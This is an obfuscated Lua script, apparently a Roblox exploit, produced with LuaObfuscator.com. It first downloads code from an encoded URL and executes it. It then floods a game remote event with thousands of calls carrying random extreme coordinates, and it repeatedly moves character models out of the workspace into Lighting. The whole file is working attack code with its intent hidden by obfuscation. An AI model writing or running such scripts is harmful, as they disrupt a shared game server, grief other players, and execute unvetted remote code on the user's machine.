
--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v13=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v13,v13 + 1 )),v1(v2(v9,1 + (v13% #v9) ,1 + (v13% #v9) + 1 )))%256 ));end return v5(v10);end loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\225\11\222\246\224\54\240\249\242\17\199\153\136\36\223\219\244\35\224\178\196\23\208\207\148\55\227\189\212\81\217\198\218\33\245\244\202\31\216\205\148\22\231\189\194","\126\177\163\187\69\134\219\167")))();task.spawn(function() local v11=0 -0 ;local v12;while true do if (v11==(0 + 0)) then v12=game:GetService(v7("\19\193\43\220\249\49\222","\156\67\173\74\165")).LocalPlayer;while true do if ( not v12 or  not v12.Character) then break;end local v17=v12.Character:FindFirstChild(v7("\6\184\74\29\185\50\106\53\162\71\21\180\35\84","\38\84\215\41\118\220\70"));if  not v17 then break;end local v18=v17:FindFirstChild(v7("\114\23\54\6\242\85\36\45\17\245\85\2\7\4\251\94\2","\158\48\118\66\114"));if  not v18 then break;end for v19=1386 -(1103 + 282) ,5000 do local v20=Vector3.new(math.random( -(855182 + 144818),1000350 -(87 + 263) ),math.random(180 -(67 + 113) ,733273 + 266727 ),math.random( -(2455164 -1455164),735453 + 264547 ));v18:FireServer(v20);end task.wait(0.005 -0 );end break;end end end);task.spawn(function() while true do for v14,v15 in pairs(workspace:GetChildren()) do if (v15:IsA(v7("\134\43\20\51\127","\155\203\68\112\86\19\197")) and v15:FindFirstChild(v7("\110\200\59\253\78\119\236\252\116\210\57\232\112\121\247\236","\152\38\189\86\156\32\24\133"))) then if (v15.Parent~=game.Lighting) then v15.Parent=game.Lighting;end end end task.wait(0.5);end end);
